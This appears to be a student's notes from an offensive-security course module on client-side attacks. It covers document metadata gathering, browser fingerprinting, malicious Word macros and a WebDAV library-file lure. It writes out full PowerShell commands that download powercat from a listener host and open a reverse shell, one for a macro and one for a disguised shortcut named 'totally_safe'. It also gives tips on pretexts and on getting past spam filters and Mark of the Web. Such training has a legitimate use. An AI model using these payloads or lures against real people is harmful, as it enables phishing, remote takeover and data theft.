Module 11: Client-side Attacks
Last updated
Last updated
One approach to information gathering without interacting with a target is to inspect the metadata tags of publicly-available documents associate with the target organization. It can be santizied, but often isn't. Documents found may be outdated as well. To do this, we can use the exiftool tool. Example: exiftool -a -u file.pdf
-a
display duplicated tags
-u
display unknown tags
We can also utilize google dorking with a search like site:example.com filetype:pdf.
If we are fine interacting with the target's website, we can use gobuster with the -x parameter to search for specific file extensions. Be aware, this is noisy and will generate log entries on the target.
Client Fingerprinting, also known as Device Fingerprinting involves obtaining operating system and brownser information to determine what that device is.
is a free web service that generates a link with an embedded token. This will gather information about the browser, IP address, and operating system when clicked.
There are some additional options like the online IP logger Grabify or JavaScript fingerprinting libraries such as fingerprint.js.
With Office macro attacks being so common, email providers and spam filter solutions often filter out all Microsoft Office documents by default. Additionally, most anti-phishing training programs stress the danger of enabling macros in an email Office document.
To provide an increase chance of the target opening our malicious document, pretext and other ways to access teh file are crucial. Examples being download links, Sharepoint/OneDrive share links, etc.
These files, if successfully sent to the targe twill be tagged with the Mark of the Web (MOTW). Documents tagged with MOTW will open in Protected View, disabling all editing and modiification settings in the document and blocks macro execution or embedded objects. The user will also be presented with the SECURITY WARNING banner, with the option to Enable Content.
Nothing to add, it's installing Microsoft Office...
Creating macros in Word: View > Macros. Make sure the file is saved as a .doc or .docm so the macros are persistent.
A new macro consists of an empty sub procedure containing several lines beginning with an apostrophe, which marks the start of a single-line comment in VBA.
We'll be leveraging ActiveX Objects, which provide access to underlying operating system commands. This can be achieve with WScript through the Windows Script Host Shell object. After instantiating a Windows Script Host Shell object with CreateObject, we can invoke the Run method for Wscript.Shell to launch an application. In this example, we'll start a PowerShell window.
Office macros are not executed automatically, so we must use teh predefined AutoOpen macro and Document_Open event.
Note: VBA has a 255-character limit for literal strings and therefore, we can't just embed the base64-encoded PowerShell commands as a single string in the example of a powercat reverse shell. This restriction does not apply to strings stored in variables, so we can split the commands into multiple lines (stored in strings) and concatenate them.
Now let's generate the base64'd powercat reverse listener: echo -ne "IEX(New-Object System.Net.WebClient).DownloadString('http://your.listener.ip.here:port/powercat.ps1');powercat -c your.listener.ip.here -p port -e powershell" | base64 Run a simple python script to break it up into the multiple variables for the VBA script:
Having now split the base64-encoded string into smaller chunks, we can update our macro:
For this section, we'll be utilizing a WebDAV share to host the payload in the form of a .lnk shortcut file for executing a PowerShell reverse shell. The reason we'll be using the WebDAV share and the .Library-ms library file is because a majority of spam filters and security technologies will pass Windows library files directly to the user. After opening it, the user will be taken to our malicious .lnk file.
First, we'll install WsgiDAV with pip3. pip3 install wsgidav If the installation of WsgiDAV fails with error: externally-managed-environment, we can use a virtual environment or install the package python3-wsgidav with apt.
Next we'll run WsgiDAV from the /home/kali/.local/bin directory.
--host
Specifies the host to server from
--port
The port to listen on
--auth
disable authentication when set to anonymous
--root
Setting the root directory of the WebDAV share
Library files consist of three major parts and are written in XML to specify parameters for accessing remote locations.
General library information
Library properties
Library Description Schema
Start by creating a new file named config.Library-ms. Important Tags and their use will be covered in each code sample section: The namespace for the library file.
The name tag: Specifies the name of the library. Examples: @shell32.dll,-34575 or @windows.storage.dll,-34582. The version tag: Any numerical value.
The isLibraryPinned tag: specifies if the library is pinned to the navigation pane in Windows Explorer. This may make it appear more genuine if set to true. The iconReference: determines what icon is used.
The templateInfo and folderType tags: These determine columns and details that appear in Windows Explorer. A GUID must be specified. The example will use the Documents GUID.
The searchConnectorDescriptionList tag: Contains a list of search connectors defined by searchConnectorDescription. These are used by library files to specify the connection settings. The isDefaultSaveLocation tag: Determines the behavior of Windows Explorer when a user chooses to save an item. Default behavior is a value of true. The isSupported tag: Used for compatability -- not documented in the Microsoft Documentation webpage. The url tag: Points to the remote location. The simpleLocation tags: contain the url tag. Can specify the remote location in a more user-friendly way as the normal locationProvider element.
Final code:
Creating the malicious .lnk:
Create Shortcut
Set the location to powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://your.listener.ip.here:port/powercat.ps1'); powercat -c your.listener.ip.here -p port -e powershell"
Name it totally_safe.
Click Finish
After that, start up a python3 web server in the directory hosting the powercat script and a netcast listener on the port you chose. Double clicking the document and enabling content will download powercat and execute the reverse listener. If you run into any issues with that like I did, take a look at using this python script from glowbase. . Additionally, if this will be running on a Windows device, ensure the command is UTF16LE (1200) encoded.